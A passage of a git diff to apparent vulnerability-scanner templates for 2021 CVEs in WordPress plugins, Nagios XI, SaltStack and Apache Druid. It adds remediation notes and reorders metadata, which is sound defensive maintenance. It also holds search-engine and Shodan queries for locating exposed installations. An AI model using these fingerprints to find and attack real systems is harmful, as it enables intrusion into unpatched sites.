tribe_tickets_redirect_to parameter before redirecting the user to the given value, leading to an arbitrary redirect issue. + remediation: | + Update to the latest version of the WordPress Event Tickets plugin (5.2.2 or higher) to fix the open redirect vulnerability. reference: - https://wpscan.com/vulnerability/80b0682e-2c3b-441b-9628-6462368e5fc7 - https://nvd.nist.gov/vuln/detail/CVE-2021-25028 @@ -14,13 +16,13 @@ info: cve-id: CVE-2021-25028 cwe-id: CWE-601 epss-score: 0.00106 - cpe: cpe:2.3:a:tri:event_tickets:*:*:*:*:*:wordpress:*:* epss-percentile: 0.42451 + cpe: cpe:2.3:a:tri:event_tickets:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: tri product: event_tickets + framework: wordpress tags: wordpress,redirect,wp-plugin,eventtickets,wpscan,cve,cve2021 http: diff --git a/http/cves/2021/CVE-2021-25033.yaml b/http/cves/2021/CVE-2021-25033.yaml index fa7d40f5d9..addaa72dab 100644 --- a/http/cves/2021/CVE-2021-25033.yaml +++ b/http/cves/2021/CVE-2021-25033.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: Noptin < 1.6.5 is susceptible to an open redirect vulnerability. The plugin does not validate the "to" parameter before redirecting the user to its given value, leading to an open redirect issue. + remediation: | + Update to Noptin plugin version 1.6.5 or later. reference: - https://wpscan.com/vulnerability/c2d2384c-41b9-4aaf-b918-c1cfda58af5c - https://plugins.trac.wordpress.org/changeset/2639592 @@ -15,13 +17,13 @@ info: cve-id: CVE-2021-25033 cwe-id: CWE-601 epss-score: 0.00115 - cpe: cpe:2.3:a:noptin:noptin:*:*:*:*:*:wordpress:*:* epss-percentile: 0.44376 + cpe: cpe:2.3:a:noptin:noptin:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: noptin product: noptin + framework: wordpress tags: wp,wpscan,cve,cve2021,wordpress,redirect,wp-plugin,noptin http: diff --git a/http/cves/2021/CVE-2021-25052.yaml b/http/cves/2021/CVE-2021-25052.yaml index 5f60899236..4c593e419e 100644 --- a/http/cves/2021/CVE-2021-25052.yaml +++ b/http/cves/2021/CVE-2021-25052.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: high description: WordPress Button Generator before 2.3.3 within the wow-company admin menu page allows arbitrary file inclusion with PHP extensions (as well as with data:// or http:// protocols), thus leading to cross-site request forgery and remote code execution. + remediation: | + Update to the latest version of the WordPress Button Generator plugin (2.3.3) to fix the remote file inclusion vulnerability. reference: - https://wpscan.com/vulnerability/a01844a0-0c43-4d96-b738-57fe5bfbd67a - https://nvd.nist.gov/vuln/detail/CVE-2021-25052 @@ -15,13 +17,13 @@ info: cve-id: CVE-2021-25052 cwe-id: CWE-352 epss-score: 0.01231 - cpe: cpe:2.3:a:wow-company:button_generator:*:*:*:*:*:wordpress:*:* epss-percentile: 0.83713 + cpe: cpe:2.3:a:wow-company:button_generator:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: wow-company product: button_generator + framework: wordpress tags: wp-plugin,authenticated,wpscan,cve,cve2021,rfi,wp,wordpress http: diff --git a/http/cves/2021/CVE-2021-25055.yaml b/http/cves/2021/CVE-2021-25055.yaml index 35b433c37f..e75c2df9d8 100644 --- a/http/cves/2021/CVE-2021-25055.yaml +++ b/http/cves/2021/CVE-2021-25055.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin is affected by a cross-site scripting vulnerability within the "visibility" parameter. + remediation: | + Update to the latest version of the FeedWordPress plugin (version 2022.0123 or higher) to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25055 @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-25055 cwe-id: CWE-79 epss-score: 0.00133 - cpe: cpe:2.3:a:feedwordpress_project:feedwordpress:*:*:*:*:*:wordpress:*:* epss-percentile: 0.47722 + cpe: cpe:2.3:a:feedwordpress_project:feedwordpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: feedwordpress_project product: feedwordpress + framework: wordpress tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated,wpscan http: diff --git a/http/cves/2021/CVE-2021-25063.yaml b/http/cves/2021/CVE-2021-25063.yaml index 81fff17679..66dea422af 100644 --- a/http/cves/2021/CVE-2021-25063.yaml +++ b/http/cves/2021/CVE-2021-25063.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: WordPress Contact Form 7 Skins plugin 2.5.0 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the tab parameter before outputting it back in an admin page. + remediation: | + Update to the latest version of the WordPress Contact Form 7 Skins plugin (2.5.1) or apply the vendor-supplied patch. reference: - https://wpscan.com/vulnerability/e2185887-3e53-4089-aa3f-981c944ee0bb - https://nvd.nist.gov/vuln/detail/CVE-2021-25063 @@ -14,13 +16,13 @@ info: cve-id: CVE-2021-25063 cwe-id: CWE-79 epss-score: 0.00106 - cpe: cpe:2.3:a:cf7skins:contact_form_7_skins:*:*:*:*:*:wordpress:*:* epss-percentile: 0.42451 + cpe: cpe:2.3:a:cf7skins:contact_form_7_skins:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: cf7skins product: contact_form_7_skins + framework: wordpress tags: wpscan,cve,cve2021,wordpress,wp-plugin,xss,contactform,authenticated http: diff --git a/http/cves/2021/CVE-2021-25065.yaml b/http/cves/2021/CVE-2021-25065.yaml index 6dd3a81fb5..22364bc9ed 100644 --- a/http/cves/2021/CVE-2021-25065.yaml +++ b/http/cves/2021/CVE-2021-25065.yaml @@ -6,25 +6,25 @@ info: severity: medium description: | The plugin was affected by a reflected XSS in custom-facebook-feed in cff-top admin page. + remediation: Fixed in version 2.19.2 reference: - https://wpscan.com/vulnerability/ae1aab4e-b00a-458b-a176-85761655bdcc - https://wordpress.org/plugins/custom-facebook-feed/ - remediation: Fixed in version 2.19.2 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2021-25065 cwe-id: CWE-79 epss-score: 0.00069 - cpe: cpe:2.3:a:smashballoon:smash_balloon_social_post_feed:*:*:*:*:*:wordpress:*:* epss-percentile: 0.28379 + cpe: cpe:2.3:a:smashballoon:smash_balloon_social_post_feed:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - publicwww-query: "/wp-content/plugins/custom-facebook-feed/" - framework: wordpress + max-request: 2 vendor: smashballoon product: smash_balloon_social_post_feed + framework: wordpress + publicwww-query: "/wp-content/plugins/custom-facebook-feed/" tags: cve,cve2021,wpscan,wordpress,wp-plugin,xss,wp,authenticated http: diff --git a/http/cves/2021/CVE-2021-25067.yaml b/http/cves/2021/CVE-2021-25067.yaml index d04256d314..9125965f48 100644 --- a/http/cves/2021/CVE-2021-25067.yaml +++ b/http/cves/2021/CVE-2021-25067.yaml @@ -6,25 +6,25 @@ info: severity: medium description: | The Landing Page Builder WordPress plugin before 1.4.9.6 was affected by a reflected XSS in page-builder-add on the ulpb_post admin page. + remediation: Fixed in version 1.4.9.6. reference: - https://wpscan.com/vulnerability/365007f0-61ac-4e81-8a3a-3a068f2c84bc - https://wordpress.org/plugins/page-builder-add/ - https://nvd.nist.gov/vuln/detail/CVE-2021-25067 - remediation: Fixed in version 1.4.9.6. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2021-25067 cwe-id: CWE-79 epss-score: 0.00069 - cpe: cpe:2.3:a:pluginops:landing_page:*:*:*:*:*:wordpress:*:* epss-percentile: 0.28379 + cpe: cpe:2.3:a:pluginops:landing_page:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: pluginops product: landing_page + framework: wordpress tags: xss,wordpress,authenticated,wpscan,cve,cve2021,wp-plugin,wp,page-builder-add http: diff --git a/http/cves/2021/CVE-2021-25074.yaml b/http/cves/2021/CVE-2021-25074.yaml index b2afd31e43..b202a4b5fe 100644 --- a/http/cves/2021/CVE-2021-25074.yaml +++ b/http/cves/2021/CVE-2021-25074.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: WordPress WebP Converter for Media < 4.0.3 contains a file (passthru.php) which does not validate the src parameter before redirecting the user to it, leading to an open redirect issue. + remediation: | + Update to the latest version of the WordPress WebP Converter for Media plugin (4.0.3) or remove the plugin if not needed. reference: - https://wpscan.com/vulnerability/f3c0a155-9563-4533-97d4-03b9bac83164 - https://nvd.nist.gov/vuln/detail/CVE-2021-25074 @@ -14,13 +16,13 @@ info: cve-id: CVE-2021-25074 cwe-id: CWE-601 epss-score: 0.00106 - cpe: cpe:2.3:a:webp_converter_for_media_project:webp_converter_for_media:*:*:*:*:*:wordpress:*:* epss-percentile: 0.42451 + cpe: cpe:2.3:a:webp_converter_for_media_project:webp_converter_for_media:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: webp_converter_for_media_project product: webp_converter_for_media + framework: wordpress tags: redirect,wp-plugin,webpconverter,wpscan,cve,cve2021,wordpress http: diff --git a/http/cves/2021/CVE-2021-25075.yaml b/http/cves/2021/CVE-2021-25075.yaml index 4cd5abe180..9ad31424fd 100644 --- a/http/cves/2021/CVE-2021-25075.yaml +++ b/http/cves/2021/CVE-2021-25075.yaml @@ -6,24 +6,24 @@ info: severity: low description: | WordPress Duplicate Page or Post plugin before 1.5.1 contains a stored cross-site scripting vulnerability. The plugin does not have any authorization and has a flawed cross-site request forgery check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing unauthenticated users to call it and change the plugin's settings, or perform such attack via cross-site request forgery. + remediation: Fixed in version 1.5.1. reference: - https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25075 - https://nvd.nist.gov/vuln/detail/CVE-2021-25075 - remediation: Fixed in version 1.5.1. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N cvss-score: 3.5 cve-id: CVE-2021-25075 cwe-id: CWE-862 epss-score: 0.00094 - cpe: cpe:2.3:a:wpdevart:duplicate_page_or_post:*:*:*:*:*:wordpress:*:* epss-percentile: 0.39063 + cpe: cpe:2.3:a:wpdevart:duplicate_page_or_post:*:*:*:*:*:wordpress:*:* metadata: max-request: 3 - framework: wordpress vendor: wpdevart product: duplicate_page_or_post + framework: wordpress tags: wpscan,cve,cve2021,wordpress,xss,wp-plugin,authenticated http: diff --git a/http/cves/2021/CVE-2021-25078.yaml b/http/cves/2021/CVE-2021-25078.yaml index ce5846ea3e..3b549083e8 100644 --- a/http/cves/2021/CVE-2021-25078.yaml +++ b/http/cves/2021/CVE-2021-25078.yaml @@ -6,25 +6,25 @@ info: severity: medium description: | The plugin does not validate, sanitise and escape the IP address of requests logged by the click tracking feature, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against admin viewing the tracked requests. + remediation: Fixed in version 2.9.0 reference: - https://wpscan.com/vulnerability/d4edb5f2-aa1b-4e2d-abb4-76c46def6c6e - https://nvd.nist.gov/vuln/detail/CVE-2021-25078 - https://plugins.trac.wordpress.org/changeset/2648196 - remediation: Fixed in version 2.9.0 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-25078 cwe-id: CWE-79 epss-score: 0.00382 - cpe: cpe:2.3:a:wpaffiliatemanager:affiliates_manager:*:*:*:*:*:wordpress:*:* epss-percentile: 0.696 + cpe: cpe:2.3:a:wpaffiliatemanager:affiliates_manager:*:*:*:*:*:wordpress:*:* metadata: - max-request: 3 verified: true - framework: wordpress + max-request: 3 vendor: wpaffiliatemanager product: affiliates_manager + framework: wordpress tags: cve,wp,wordpress,authenticated,cve2021,affiliates-manager,wp-plugin,xss,wpscan http: diff --git a/http/cves/2021/CVE-2021-25085.yaml b/http/cves/2021/CVE-2021-25085.yaml index 35df057f5d..281155b8ef 100644 --- a/http/cves/2021/CVE-2021-25085.yaml +++ b/http/cves/2021/CVE-2021-25085.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting. + remediation: | + Update to the latest version of the WOOF WordPress plugin, which includes proper input sanitization to mitigate the XSS vulnerability. reference: - https://wpscan.com/vulnerability/b7dd81c6-6af1-4976-b928-421ca69bfa90 - https://plugins.trac.wordpress.org/changeset/2648751 @@ -16,14 +18,14 @@ info: cve-id: CVE-2021-25085 cwe-id: CWE-79 epss-score: 0.001 - cpe: cpe:2.3:a:pluginus:woocommerce_products_filter:*:*:*:*:*:wordpress:*:* epss-percentile: 0.40521 + cpe: cpe:2.3:a:pluginus:woocommerce_products_filter:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: pluginus product: woocommerce_products_filter + framework: wordpress tags: cve,cve2021,wordpress,wp-plugin,wp,xss,wpscan http: diff --git a/http/cves/2021/CVE-2021-25099.yaml b/http/cves/2021/CVE-2021-25099.yaml index 0939c0e40b..094e8177a7 100644 --- a/http/cves/2021/CVE-2021-25099.yaml +++ b/http/cves/2021/CVE-2021-25099.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress GiveWP plugin before 2.17.3 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the form_id parameter before returning it in the response of an unauthenticated request via the give_checkout_login AJAX action. An attacker can inject arbitrary script in the browser of a user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the GiveWP plugin (2.17.3 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/87a64b27-23a3-40f5-a3d8-0650975fee6f - https://wordpress.org/plugins/give/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2021-25099 cwe-id: CWE-79 epss-score: 0.00133 - cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:* epss-percentile: 0.47722 + cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: givewp product: givewp + framework: wordpress tags: xss,cve2021,wp,give,wordpress,cve,wp-plugin,unauth,wpscan http: diff --git a/http/cves/2021/CVE-2021-25104.yaml b/http/cves/2021/CVE-2021-25104.yaml index 4adf1731db..94d59a65c9 100644 --- a/http/cves/2021/CVE-2021-25104.yaml +++ b/http/cves/2021/CVE-2021-25104.yaml @@ -5,25 +5,25 @@ info: author: Akincibor severity: medium description: WordPress Ocean Extra plugin before 1.9.5 contains a cross-site scripting vulnerability. The plugin does not escape generated links which are then used when the OceanWP theme is active. + remediation: Fixed in version 1.9.5. reference: - https://wpscan.com/vulnerability/2ee6f1d8-3803-42f6-9193-3dd8f416b558 - https://wordpress.org/plugins/ocean-extra/ - https://nvd.nist.gov/vuln/detail/CVE-2021-25104 - remediation: Fixed in version 1.9.5. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-25104 cwe-id: CWE-79 epss-score: 0.00119 - cpe: cpe:2.3:a:oceanwp:ocean_extra:*:*:*:*:*:wordpress:*:* epss-percentile: 0.45304 + cpe: cpe:2.3:a:oceanwp:ocean_extra:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: oceanwp product: ocean_extra + framework: wordpress tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated,wpscan,wp,ocean-extra http: diff --git a/http/cves/2021/CVE-2021-25111.yaml b/http/cves/2021/CVE-2021-25111.yaml index b889fa84ae..bfabd96388 100644 --- a/http/cves/2021/CVE-2021-25111.yaml +++ b/http/cves/2021/CVE-2021-25111.yaml @@ -5,6 +5,8 @@ info: author: akincibor severity: medium description: WordPress English Admin plugin before 1.5.2 contains an open redirect vulnerability. The plugin does not validate the admin_custom_language_return_url before redirecting users to it. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Update to the latest version of the WordPress English Admin plugin (1.5.2 or higher) to fix the open redirect vulnerability. reference: - https://wpscan.com/vulnerability/af548fab-96c2-4129-b609-e24aad0b1fc4 - https://nvd.nist.gov/vuln/detail/CVE-2021-25111 @@ -14,13 +16,13 @@ info: cve-id: CVE-2021-25111 cwe-id: CWE-601 epss-score: 0.0012 - cpe: cpe:2.3:a:english_wordpress_admin_project:english_wordpress_admin:*:*:*:*:*:wordpress:*:* epss-percentile: 0.45408 + cpe: cpe:2.3:a:english_wordpress_admin_project:english_wordpress_admin:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: english_wordpress_admin_project product: english_wordpress_admin + framework: wordpress tags: cve2021,unauth,wpscan,wp-plugin,redirect,wordpress,wp,cve http: diff --git a/http/cves/2021/CVE-2021-25112.yaml b/http/cves/2021/CVE-2021-25112.yaml index 0b072155a3..559c3259ce 100644 --- a/http/cves/2021/CVE-2021-25112.yaml +++ b/http/cves/2021/CVE-2021-25112.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress WHMCS Bridge plugin before 6.4b contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the error parameter before outputting it back in the admin dashboard. + remediation: | + Update WordPress WHMCS Bridge to version 6.4b or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c - https://plugins.trac.wordpress.org/changeset/2659751 @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-25112 cwe-id: CWE-79 epss-score: 0.00133 - cpe: cpe:2.3:a:i-plugins:whmcs_bridge:*:*:*:*:*:wordpress:*:* epss-percentile: 0.47722 + cpe: cpe:2.3:a:i-plugins:whmcs_bridge:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: i-plugins product: whmcs_bridge + framework: wordpress tags: whmcs,xss,wpscan,wordpress,wp-plugin,wp,authenticated http: diff --git a/http/cves/2021/CVE-2021-25114.yaml b/http/cves/2021/CVE-2021-25114.yaml index ef7f246b6f..e09fcadd57 100644 --- a/http/cves/2021/CVE-2021-25114.yaml +++ b/http/cves/2021/CVE-2021-25114.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Paid Memberships Pro plugin before 2.6.7 is susceptible to blind SQL injection. The plugin does not escape the discount_code in one of its REST routes before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade to WordPress Paid Memberships Pro version 2.6.7 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/6c25a5f0-a137-4ea5-9422-8ae393d7b76b - https://wordpress.org/plugins/paid-memberships-pro/ @@ -17,15 +19,15 @@ info: cve-id: CVE-2021-25114 cwe-id: CWE-89 epss-score: 0.04575 - cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:* epss-percentile: 0.91459 + cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 - google-query: inurl:"/wp-content/plugins/paid-memberships-pro" verified: true - framework: wordpress + max-request: 2 vendor: strangerstudios product: paid_memberships_pro + framework: wordpress + google-query: inurl:"/wp-content/plugins/paid-memberships-pro" tags: wp-plugin,wp,sqli,paid-memberships-pro,wpscan,cve,cve2021,wordpress http: diff --git a/http/cves/2021/CVE-2021-25118.yaml b/http/cves/2021/CVE-2021-25118.yaml index 36245b050c..700e06b021 100644 --- a/http/cves/2021/CVE-2021-25118.yaml +++ b/http/cves/2021/CVE-2021-25118.yaml @@ -5,24 +5,24 @@ info: author: DhiyaneshDK severity: medium description: Yoast SEO plugin 16.7 to 17.2 is susceptible to information disclosure, The plugin discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints, which can help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities. + remediation: Fixed in version 17.3. reference: - https://wpscan.com/vulnerability/2c3f9038-632d-40ef-a099-6ea202efb550 - https://plugins.trac.wordpress.org/changeset/2608691 - https://nvd.nist.gov/vuln/detail/CVE-2021-25118 - remediation: Fixed in version 17.3. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-25118 cwe-id: CWE-200 epss-score: 0.00206 - cpe: cpe:2.3:a:yoast:yoast_seo:*:*:*:*:*:wordpress:*:* epss-percentile: 0.57883 + cpe: cpe:2.3:a:yoast:yoast_seo:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: yoast product: yoast_seo + framework: wordpress tags: wpscan,wordpress,cve2021,wp-plugin,fpd,cve,wp http: diff --git a/http/cves/2021/CVE-2021-25120.yaml b/http/cves/2021/CVE-2021-25120.yaml index 3efbd810ac..311daa2f17 100644 --- a/http/cves/2021/CVE-2021-25120.yaml +++ b/http/cves/2021/CVE-2021-25120.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: Easy Social Feed < 6.2.7 is susceptible to reflected cross-site scripting because the plugin does not sanitize and escape a parameter before outputting it back in an admin dashboard page, leading to it being executed in the context of a logged admin or editor. + remediation: | + Update to Easy Social Feed version 6.2.7 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/6dd00198-ef9b-4913-9494-e08a95e7f9a0 - https://wpscan.com/vulnerability/0ad020b5-0d16-4521-8ea7-39cd206ab9f6 @@ -15,13 +17,13 @@ info: cve-id: CVE-2021-25120 cwe-id: CWE-79 epss-score: 0.0012 - cpe: cpe:2.3:a:easysocialfeed:easy_social_feed:*:*:*:*:pro:wordpress:*:* epss-percentile: 0.45408 + cpe: cpe:2.3:a:easysocialfeed:easy_social_feed:*:*:*:*:pro:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: easysocialfeed product: easy_social_feed + framework: wordpress tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated,wpscan http: diff --git a/http/cves/2021/CVE-2021-25281.yaml b/http/cves/2021/CVE-2021-25281.yaml index 84a03c4664..d4e71f453f 100644 --- a/http/cves/2021/CVE-2021-25281.yaml +++ b/http/cves/2021/CVE-2021-25281.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: SaltStack Salt before 3002.5 does not honor eauth credentials for the wheel_async client, allowing attackers to remotely run any wheel modules on the master. + remediation: | + Upgrade to SaltStack Salt version 3002.5 or later to mitigate this vulnerability. reference: - http://hackdig.com/02/hack-283902.htm - https://dozer.nz/posts/saltapi-vulns @@ -17,8 +19,8 @@ info: cve-id: CVE-2021-25281 cwe-id: CWE-287 epss-score: 0.84879 - cpe: cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:* epss-percentile: 0.9806 + cpe: cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: saltstack diff --git a/http/cves/2021/CVE-2021-25296.yaml b/http/cves/2021/CVE-2021-25296.yaml index 593f6aafcf..1f45935357 100644 --- a/http/cves/2021/CVE-2021-25296.yaml +++ b/http/cves/2021/CVE-2021-25296.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Upgrade Nagios XI to a patched version or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md - https://github.com/rapid7/metasploit-framework/pull/17494 @@ -18,14 +20,14 @@ info: cve-id: CVE-2021-25296 cwe-id: CWE-78 epss-score: 0.89404 - cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* epss-percentile: 0.98323 + cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: - max-request: 4 - shodan-query: title:"Nagios XI" verified: true + max-request: 4 vendor: nagios product: nagios_xi + shodan-query: title:"Nagios XI" tags: packetstorm,rce,oast,authenticated,msf,cve,cve2021,nagiosxi,kev http: diff --git a/http/cves/2021/CVE-2021-25297.yaml b/http/cves/2021/CVE-2021-25297.yaml index 3682c6171e..50b16d5ca5 100644 --- a/http/cves/2021/CVE-2021-25297.yaml +++ b/http/cves/2021/CVE-2021-25297.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Upgrade Nagios to a version higher than 5.7.5 or apply the provided patch to mitigate the vulnerability. reference: - https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md - https://github.com/rapid7/metasploit-framework/pull/17494 @@ -18,14 +20,14 @@ info: cve-id: CVE-2021-25297 cwe-id: CWE-78 epss-score: 0.89404 - cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* epss-percentile: 0.98323 + cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: - max-request: 4 - shodan-query: title:"Nagios XI" verified: true + max-request: 4 vendor: nagios product: nagios_xi + shodan-query: title:"Nagios XI" tags: packetstorm,rce,oast,authenticated,msf,cve,cve2021,nagiosxi,kev http: diff --git a/http/cves/2021/CVE-2021-25298.yaml b/http/cves/2021/CVE-2021-25298.yaml index 911c29db4c..1dc28fc9f5 100644 --- a/http/cves/2021/CVE-2021-25298.yaml +++ b/http/cves/2021/CVE-2021-25298.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Upgrade Nagios XI to a patched version or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md - https://github.com/rapid7/metasploit-framework/pull/17494 @@ -18,14 +20,14 @@ info: cve-id: CVE-2021-25298 cwe-id: CWE-78 epss-score: 0.97378 - cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* epss-percentile: 0.99861 + cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: - max-request: 4 - shodan-query: title:"Nagios XI" verified: true + max-request: 4 vendor: nagios product: nagios_xi + shodan-query: title:"Nagios XI" tags: packetstorm,oast,authenticated,msf,cve,cve2021,nagiosxi,rce,kev http: diff --git a/http/cves/2021/CVE-2021-25299.yaml b/http/cves/2021/CVE-2021-25299.yaml index c019878ad2..216d6953f4 100644 --- a/http/cves/2021/CVE-2021-25299.yaml +++ b/http/cves/2021/CVE-2021-25299.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Nagios XI 5.7.5 contains a cross-site scripting vulnerability in the file /usr/local/nagiosxi/html/admin/sshterm.php, due to improper sanitization of user-controlled input. A maliciously crafted URL, when clicked by an admin user, can be used to steal session cookies, or it can be chained with the previous bugs to get one-click remote command execution on the Nagios XI server. + remediation: | + Upgrade Nagios XI to the latest version or apply the provided patch to fix the XSS vulnerability. reference: - https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md#cve-2021-25299 - http://nagios.com @@ -18,14 +20,14 @@ info: cve-id: CVE-2021-25299 cwe-id: CWE-79 epss-score: 0.96825 - cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* epss-percentile: 0.99548 + cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: - max-request: 3 - shodan-query: title:"Nagios XI" verified: true + max-request: 3 vendor: nagios product: nagios_xi + shodan-query: title:"Nagios XI" tags: cve,cve2021,nagios,nagiosxi,xss,authenticated http: diff --git a/http/cves/2021/CVE-2021-25646.yaml b/http/cves/2021/CVE-2021-25646.yaml index 1fc1bb5c1b..216a63294c 100644 --- a/http/cves/2021/CVE-2021-25646.yaml +++ b/http/cves/2021/CVE-2021-25646.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache Druid is susceptible to remote code execution because by default it lacks authorization and authentication. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server. + remediation: | + Apply the latest security patches or upgrade to a patched version of Apache Druid. reference: - https://paper.seebug.org/1476/ - https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E @@ -18,8 +20,8 @@ info: cve-id: CVE-2021-25646 cwe-id: CWE-732 epss-score: 0.97361 - cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:* epss-percentile: 0.99843 + cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git 